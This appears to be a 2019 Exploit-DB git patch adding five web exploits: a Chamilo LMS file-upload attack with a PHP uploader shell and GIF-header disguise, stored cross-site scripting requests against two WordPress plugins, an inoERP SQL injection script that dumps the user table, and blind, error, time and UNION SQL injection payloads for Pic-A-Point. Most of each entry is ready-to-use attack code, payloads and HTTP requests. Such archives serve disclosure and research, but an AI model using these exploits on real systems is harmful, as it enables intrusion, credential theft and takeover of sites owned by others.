From dc44a5e5a693b4e320c0aeb9d3fb03a600c0b284 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 27 Sep 2019 05:01:48 +0000 Subject: [PATCH] DB: 2019-09-27 5 changes to exploits/shellcodes Chamillo LMS 1.11.8 - Arbitrary File Upload Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting inoERP 4.15 - 'download' SQL Injection citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection --- exploits/php/webapps/47423.txt | 55 +++++++++++++++++++++++++++++++++ exploits/php/webapps/47424.txt | 48 +++++++++++++++++++++++++++++ exploits/php/webapps/47425.txt | 56 ++++++++++++++++++++++++++++++++++ exploits/php/webapps/47426.txt | 48 +++++++++++++++++++++++++++++ exploits/php/webapps/47427.txt | 34 +++++++++++++++++++++ files_exploits.csv | 5 +++ 6 files changed, 246 insertions(+) create mode 100644 exploits/php/webapps/47423.txt create mode 100644 exploits/php/webapps/47424.txt create mode 100644 exploits/php/webapps/47425.txt create mode 100644 exploits/php/webapps/47426.txt create mode 100644 exploits/php/webapps/47427.txt diff --git a/exploits/php/webapps/47423.txt b/exploits/php/webapps/47423.txt new file mode 100644 index 000000000..715362da9 --- /dev/null +++ b/exploits/php/webapps/47423.txt @@ -0,0 +1,55 @@ +# Exploit Title: Chamillo LMS 1.11.8 - Arbitrary File Upload +# Google Dork: "powered by chamilo" +# Date: 2018-10-05 +# Exploit Author: Sohel Yousef jellyfish security team +# Software Link: https://chamilo.org/en/download/ +# Version: Chamilo 1.11.8 or lower to 1.8 +# Category: webapps + +# 1. Description +# Any registered user can upload files and rename and change the file type to +# php5 or php7 by ckeditor module in my files section + +# register here : +# http://localhost/chamilo//main/auth/inscription.php +# after registration you can view this sections +# http://localhost/chamilo/main/social/myfiles.php +# http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0 +# upload your shell in gif format and then rename the format +# if the rename function was desabled and add this GIF89;aGIF89;aGIF89;a before + + PHP Test +
+ + +
+ + + FILE UPLOAD


'; + $tgt_dir = "uploads/"; + $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']); + echo "
TARGET FILE= ".$tgt_file; + //$filename = $_FILES['fileToUpload']['name']; + echo "
FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"]; + if(isset($_POST['submit'])) + { + if(file_exists("uploads/".$_FILES["fileToUpload"]["name"])) + { echo "
file exists, try with another name"; } + else { + echo "
STARTING UPLOAD PROCESS
"; + if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], +$tgt_file)) + { echo "
File UPLOADED:- ".$tgt_file; } + + else { echo "
ERROR WHILE UPLOADING FILE
"; } + } + } +?> + + + +# and uplaod it as php.gif +# you can browse the files form right click and click on browse option \ No newline at end of file diff --git a/exploits/php/webapps/47424.txt b/exploits/php/webapps/47424.txt new file mode 100644 index 000000000..a4c6ad519 --- /dev/null +++ b/exploits/php/webapps/47424.txt @@ -0,0 +1,48 @@ +# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting +# Google Dork: N/A +# Date: 2019-06-11 +# Exploit Author: Unk9vvN +# Vendor Homepage: https://duplicate-post.lopo.it/ +# Software Link: https://wordpress.org/plugins/duplicate-post/ +# Version: 3.2.3 +# Tested on: Kali Linux +# CVE: N/A + +# Description +# This vulnerability is in the validation mode and is located in the plugin management panel and the vulnerability type is stored . the vulnerability parameters are as follows. + +1.Go to the 'Settings' section +2.Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by", "Do not copy these fields" sections +3.Click the "Save Changes" option +4.Your payload will run + +# URI: http://localhost/wp-admin/options-general.php?page=duplicatepost +# Parameter & Payoad: + +duplicate_post_title_prefix="> +duplicate_post_title_suffix="> +duplicate_post_increase_menu_order_by="> +duplicate_post_blacklist="> + + +# +# PoC +# +POST /wp-admin/options.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost +Content-Type: application/x-www-form-urlencoded +Content-Length: 981 +Connection: close +Upgrade-Insecure-Requests: 1 +DNT: 1 + +option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1 + + +# Discovered by: +https://t.me/Unk9vvN \ No newline at end of file diff --git a/exploits/php/webapps/47425.txt b/exploits/php/webapps/47425.txt new file mode 100644 index 000000000..6c7c0c41b --- /dev/null +++ b/exploits/php/webapps/47425.txt @@ -0,0 +1,56 @@ +# Exploit Title: all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting +# Google Dork: inurl:"\wp-content\plugins\all-in-one-seo-pack" +# Date: 2019-06-13 +# Exploit Author: Unk9vvN +# Vendor Homepage: https://semperplugins.com/all-in-one-seo-pack-pro-version +# Software Link: https://wordpress.org/plugins/all-in-one-seo-pack/ +# Version: 3.2.7 +# Tested on: Windows 10 +# CVE: N/A + +# Description +# This vulnerability is in the validation mode and is located in the all-in-one-seo-pack tab inside the and the vulnerability type is stored . the vulnerability parameters are as follows. + +1.Go to the 'all-in-one-seo-pack' tab +2.Select 'general settings' section +3.Enter the payload in "Additional Front Page Headers","Additional Posts Page Headers" section +4.Click the "Update Options" option +4.Your payload will run on visit page + + +# URI: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack +# Payload: "> + +# +# PoC +# +POST /wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php +Content-Type: multipart/form-data; boundary=---------------------------24442753012045 +Content-Length: 8625 +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------24442753012045 +Content-Disposition: form-data; name="aiosp_front_meta_tags" + +"> +-----------------------------24442753012045 +Content-Disposition: form-data; name="aiosp_home_meta_tags" + +"> +-----------------------------24442753012045 + +Content-Disposition: form-data; name="Submit" + +Update Options » +-----------------------------24442753012045-- + + +# Discovered by: +https://unk9vvn.com \ No newline at end of file diff --git a/exploits/php/webapps/47426.txt b/exploits/php/webapps/47426.txt new file mode 100644 index 000000000..264048ab9 --- /dev/null +++ b/exploits/php/webapps/47426.txt @@ -0,0 +1,48 @@ +# Exploit Title: inoERP 4.15 - 'download' SQL Injection +# Date: 2019-09-13 +# Exploit Author: Semen Alexandrovich Lyhin +# Vendor Homepage: http://inoideas.org/ +# Version: 4.15 +# CVE: N/A + + +# A malicious query can be sent in base64 encoding to unserialize() function. +# It can be deserialized as an array without any sanitization then. +# After it, each element of the array is passed directly to the SQL query. + + +#!/bin/python + +import os +import base64 +import requests +import sys + +def generatePayload(query): + #THIS FUNCTION IS INSECURE BY DESIGN + b64_query = base64.b64encode(query); + return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read() + + +def ExecSQL(query): + data = {"data":query, + "data_type":"sql_query"} + + r = requests.post("http://" + ip + "/download.php", data=data) + return r.content + + +if __name__ == "__main__": + + if len(sys.argv) != 3: + print '(+) usage: %s ' % sys.argv[0] + print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0] + exit() + + ip = sys.argv[1] + "/" + sys.argv[2] + + #if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw== + + data = r"select * from ino_user;" + + print ExecSQL(generatePayload(data)); \ No newline at end of file diff --git a/exploits/php/webapps/47427.txt b/exploits/php/webapps/47427.txt new file mode 100644 index 000000000..135100c32 --- /dev/null +++ b/exploits/php/webapps/47427.txt @@ -0,0 +1,34 @@ +# Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection +# Author: Cakes +# Discovery Date: 2019-09-26 +# Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point +# Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip +# Tested Version: 1.1 +# Tested on OS: CentOS 7 +# CVE: N/A + +# Discription: +# Simple SQL injection after application authentication. + +# POST Request + +# Parameter: Consignment (POST) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) + +Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: Consignment=1234' AND (SELECT 4396 FROM(SELECT COUNT(*),CONCAT(0x7162707871,(SELECT (ELT(4396=4396,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hufy&Submit=Trace now + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: Consignment=1234' AND (SELECT 9267 FROM (SELECT(SLEEP(5)))qpkL)-- OiWK&Submit=Trace now + +# Type: UNION query +# Title: Generic UNION query (NULL) - 20 columns + +Payload: Consignment=1234' UNION ALL SELECT NULL,CONCAT(0x7162707871,0x614b666177515872456a7177706f6b654d54744e75644e4b597648496742464c6346656865654e67,0x716a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cUud&Submit=Trace now \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 997980bdb..8af18ebd6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41760,3 +41760,8 @@ id,file,description,date,author,type,platform,port 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php, 47420,exploits/json/webapps/47420.txt,"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution",2019-09-25,"Semen Alexandrovich Lyhin",webapps,json, 47422,exploits/php/webapps/47422.txt,"YzmCMS 5.3 - 'Host' Header Injection",2019-09-25,"Debashis Pal",webapps,php, +47423,exploits/php/webapps/47423.txt,"Chamillo LMS 1.11.8 - Arbitrary File Upload",2019-09-26,"Sohel Yousef",webapps,php, +47424,exploits/php/webapps/47424.txt,"Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php, +47425,exploits/php/webapps/47425.txt,"all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting",2019-09-26,Unk9vvN,webapps,php, +47426,exploits/php/webapps/47426.txt,"inoERP 4.15 - 'download' SQL Injection",2019-09-26,"Semen Alexandrovich Lyhin",webapps,php, +47427,exploits/php/webapps/47427.txt,"citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection",2019-09-26,cakes,webapps,php,